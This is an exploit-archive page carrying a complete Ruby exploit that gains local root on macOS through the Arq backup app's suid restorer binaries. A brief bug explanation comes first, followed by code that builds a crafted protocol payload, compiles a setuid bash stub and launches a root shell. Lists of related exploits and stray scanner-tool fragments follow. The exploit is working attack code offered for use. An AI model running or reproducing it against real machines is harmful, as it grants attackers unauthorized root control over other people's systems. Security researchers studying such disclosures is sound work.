Menu

Search for hundreds of thousands of exploits

"Arq 5.9.7 - Local Privilege Escalation"

Author

Exploit author

"Mark Wadham"

Platform

Exploit platform

macos

Release date

Exploit published date

2017-12-06

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
=begin
As well as the other bugs affecting Arq <= 5.9.6 there is also another issue
with the suid-root restorer binaries in Arq for Mac. There are three of them
and they are used to execute restores of backed up files from the various
cloud providers.

After reversing the inter-app protocol I discovered that the path to the
restorer binary was specified as part of the data packet sent by the UI. After
receiving this, the restorer binaries then set +s and root ownership on this
path. This means we can specify an arbitrary path which will receive +s and root
ownership.

This issue is fixed in Arq 5.10.
=end

#!/usr/bin/env ruby

##################################################################
###### Arq <= 5.9.7 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html               ######
##################################################################

s = File.stat("/Applications/Arq.app/Contents/Resources/standardrestorer")

if s.mode != 0104755 or s.uid != 0
  puts "Not vulnerable - standardrestorer is not suid root."
  exit 1
end

binary_target = "/tmp/arq_597_exp"

d = "\x01\x00\x00\x00\x00\x00\x00\x00"
e = "\x00\x00\x00\x00\x03"
z = "0000"
target = sprintf("%s%s-%s-%s-%s-%s%s%s", z,z,z,z,z,z,z,z)
plist = "<plist version=\"1.0\"><dict><\/dict><\/plist>"
backup_set = "0" * 40
hmac = "0" * 40

payload = sprintf(
  "%s%s%s%s\$%s%s\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00" +
  "\x00\x00\x00\x00\x00\x09\x00\x00\x02\xd0\x96\x82\xef\xd8\x00\x00\x00\x00" +
  "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x08\x30\x2e\x30" +
  "\x30\x30\x30\x30\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
  "\x00\x00\x00\x00\x00\x00\x00%s%s%s\x28%s\x01\x00\x00\x00%s\x00\x00\x00%s" +
  "\x00\x00\x00\x00\x16\x00\x00\x00\x02%s\x28%s\x01\x00\x00\x00%s\x00\x00" +
  "\x00%s\x00\x00\x00\x00\x00\x00\x00\x01\xf5\x00\x00\x00\x00\x00\x00\x00" +
  "\x14\x00%s\x00\x00\x00\x00\x03%s\x0a",
    d, binary_target.length.chr, binary_target,
    d, target,
    d, plist.length.chr, plist,
    d, backup_set,
    d, d, d, hmac,
    d, d, d, e * 10
  )

shellcode = "#include <unistd.h>\nint main()\n{ setuid(0);setgid(0);"+
  "execl(\"/bin/bash\",\"bash\",\"-c\",\"rm -f #{binary_target};/bin/bash\","+
  "NULL);return 0; }"

IO.popen("gcc -xc -o #{binary_target} -", mode="r+") do |io|
  io.write(shellcode)
  io.close
end

IO.popen("/Applications/Arq.app/Contents/Resources/standardrestorer " +
  "2>/dev/null", mode="r+") do |io|
  io.getc && io.write(payload)
end

timeout=3
i=0

while (s = File.stat(binary_target)) && (s.mode != 0104755 or s.uid != 0)
  sleep 0.1
  i += 1

  if i >= (timeout * 10)
    break
  end
end

if s.mode == 0104755 and s.uid == 0
  system(binary_target)
  exit 0
end

puts "exploit failed"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-05-12 "MacOS 320.whatis Script - Privilege Escalation" local macos "Csaba Fitzl"
2020-04-16 "VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)" local macos Metasploit
2020-03-20 "VMware Fusion 11.5.2 - Privilege Escalation" local macos "Rich Mirch"
2020-03-17 "VMWare Fusion - Local Privilege Escalation" local macos Grimm
2019-12-18 "macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()" dos macos "Google Security Research"
2019-11-22 "macOS 10.14.6 - root->kernel Privilege Escalation via update_dyld_shared_cache" local macos "Google Security Research"
2019-11-05 "macOS XNU - Missing Locking in checkdirs_callback() Enables Race with fchdir_common()" dos macos "Google Security Research"
2019-11-04 "Apple macOS 10.15.1 - Denial of Service (PoC)" dos macos 08Tc3wBB
2019-10-09 "XNU - Remote Double-Free via Data Race in IPComp Input Path" dos macos "Google Security Research"
2019-09-19 "macOS 18.7.0 Kernel - Local Privilege Escalation" local macos A2nkF
Release Date Title Type Platform Author
2018-07-30 "Charles Proxy 4.2 - Local Privilege Escalation" local macos "Mark Wadham"
2018-01-29 "Arq 5.10 - Local Privilege Escalation (1)" local macos "Mark Wadham"
2018-01-29 "Arq 5.10 - Local Privilege Escalation (2)" local macos "Mark Wadham"
2017-12-06 "Sera 1.2 - Local Privilege Escalation / Password Disclosure" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 5.0.1 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Arq 5.9.6 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Arq 5.9.7 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 5.0.3 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Murus 1.4.11 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Proxifier for Mac 2.19 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 5.0.0 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Apple macOS 10.13.1 (High Sierra) - Insecure Cron System Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation" local macos "Mark Wadham"
2017-07-18 "Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation" local macos "Mark Wadham"
2017-04-11 "Proxifier for Mac 2.17/2.18 - Privesc Escalation" local macos "Mark Wadham" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected